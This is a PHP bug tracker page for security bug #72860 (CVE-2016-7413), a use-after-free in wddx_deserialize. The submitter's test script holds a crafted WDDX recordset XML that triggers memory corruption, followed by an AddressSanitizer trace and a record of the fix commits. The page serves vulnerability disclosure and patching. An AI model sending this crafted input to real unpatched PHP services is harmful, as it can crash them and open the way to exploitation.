PHP :: Sec Bug #72860 :: wddx_deserialize use-after-free

Sec Bug #72860	wddx_deserialize use-after-free
Submitted:	2016-08-16 22:42 UTC	Modified:	2016-09-16 13:39 UTC
From:	fernando at null-life dot com	Assigned:	stas (profile)
Status:	Closed	Package:	WDDX related
PHP Version:	5.6.25	OS:	*
Private report:	No	CVE-ID:	2016-7413

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	fernando at null-life dot com
New email:
PHP Version:		OS:

New Comment:

[2016-08-16 22:42 UTC] fernando at null-life dot com

Description:
------------
When WDDX tries to deserialize "recordset" element, use after free happens if close tag for the field is not found. This happens only when field names are set.

Test script:
---------------
<?php

$xml=<<<XML
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version='1.0'>
       <recordset fieldNames='F'>
               <field name='F'>
       </recordset>
</wddxPacket>
XML;

var_dump(wddx_deserialize($xml));

Expected result:
----------------
No crash

Actual result:
--------------
USE_ZEND_ALLOC=0 /home/operac/build2/bin/php -n wdx13.php
=================================================================
==31491==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300004caf0 at pc 0x0000018c8492 bp 0x7ffe96410330 sp 0x7ffe96410320
READ of size 4 at 0x60300004caf0 thread T0
    #0 0x18c8491 in zval_delref_p /home/operac/build2/php-src-56/Zend/zend.h:411
    #1 0x18c8491 in i_zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute.h:76
    #2 0x18c8491 in _zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute_API.c:424
    #3 0x15c7840 in wddx_stack_destroy /home/operac/build2/php-src-56/ext/wddx/wddx.c:234
    #4 0x15c7840 in php_wddx_deserialize_ex /home/operac/build2/php-src-56/ext/wddx/wddx.c:1192
    #5 0x15c878d in zif_wddx_deserialize /home/operac/build2/php-src-56/ext/wddx/wddx.c:1391
    #6 0x1d5c3e3 in zend_do_fcall_common_helper_SPEC /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:558
    #7 0x1c0568c in execute_ex /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:363
    #8 0x194d3d2 in zend_execute_scripts /home/operac/build2/php-src-56/Zend/zend.c:1341
    #9 0x169b32f in php_execute_script /home/operac/build2/php-src-56/main/main.c:2613
    #10 0x1d653b6 in do_cli /home/operac/build2/php-src-56/sapi/cli/php_cli.c:994
    #11 0x4550a0 in main /home/operac/build2/php-src-56/sapi/cli/php_cli.c:1378
    #12 0x7f5378c6182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #13 0x4556b8 in _start (/home/operac/build2/bin/php+0x4556b8)

0x60300004caf0 is located 16 bytes inside of 32-byte region [0x60300004cae0,0x60300004cb00)
freed by thread T0 here:
    #0 0x7f537b22b2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x19a93ae in zend_hash_destroy /home/operac/build2/php-src-56/Zend/zend_hash.c:548
    #2 0x193e4f0 in _zval_dtor_func /home/operac/build2/php-src-56/Zend/zend_variables.c:45
    #3 0x18c8305 in _zval_dtor /home/operac/build2/php-src-56/Zend/zend_variables.h:35
    #4 0x18c8305 in i_zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute.h:79
    #5 0x18c8305 in _zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute_API.c:424
    #6 0x15c7840 in wddx_stack_destroy /home/operac/build2/php-src-56/ext/wddx/wddx.c:234
    #7 0x15c7840 in php_wddx_deserialize_ex /home/operac/build2/php-src-56/ext/wddx/wddx.c:1192
    #8 0x15c878d in zif_wddx_deserialize /home/operac/build2/php-src-56/ext/wddx/wddx.c:1391
    #9 0x1d5c3e3 in zend_do_fcall_common_helper_SPEC /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:558
    #10 0x1c0568c in execute_ex /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:363
    #11 0x194d3d2 in zend_execute_scripts /home/operac/build2/php-src-56/Zend/zend.c:1341
    #12 0x169b32f in php_execute_script /home/operac/build2/php-src-56/main/main.c:2613
    #13 0x1d653b6 in do_cli /home/operac/build2/php-src-56/sapi/cli/php_cli.c:994
    #14 0x4550a0 in main /home/operac/build2/php-src-56/sapi/cli/php_cli.c:1378
    #15 0x7f5378c6182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7f537b22b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x15b4277 in php_wddx_push_element /home/operac/build2/php-src-56/ext/wddx/wddx.c:876
    #2 0x15ec5d3 in _start_element_handler /home/operac/build2/php-src-56/ext/xml/compat.c:84
    #3 0x7f53799bda20 in xmlParseStartTag (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x45a20)

SUMMARY: AddressSanitizer: heap-use-after-free /home/operac/build2/php-src-56/Zend/zend.h:411 zval_delref_p

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-09-06 06:43 UTC] stas@php.net

-Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: needed

[2016-09-06 06:43 UTC] stas@php.net

The fix is in security repo as ee552853ff4d72f626102025133e2cd1575043ee and in https://gist.github.com/4f730c88f90c15b0216e8651af525972

please verify

[2016-09-12 02:33 UTC] stas@php.net

Related To: Bug #73064

[2016-09-12 07:48 UTC] stas@php.net

-PHP Version: 7.0.9 +PHP Version: 5.6.25

[2016-09-13 04:04 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b88393f08a558eec14964a55d3c680fe67407712
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-09-13 04:04 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-09-13 04:06 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-09-13 04:09 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-09-13 04:11 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-09-13 09:02 UTC] ab@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b88393f08a558eec14964a55d3c680fe67407712
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-09-15 09:30 UTC] tyrael@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=780daee62b55995a10f8e849159eff0a25bacb9d
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-09-16 09:25 UTC] stackexploit at gmail dot com

Related To: Bug #73064

[2016-09-16 09:25 UTC] stackexploit at gmail dot com

Related To: Bug #73064

[2016-09-16 13:39 UTC] kaplan@php.net

-CVE-ID: needed +CVE-ID: 2016-7413

[2016-10-17 10:08 UTC] bwoebi@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b88393f08a558eec14964a55d3c680fe67407712
Log: Fix bug #72860: wddx_deserialize use-after-free

[2016-10-17 10:08 UTC] bwoebi@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 12:01:29 2024 UTC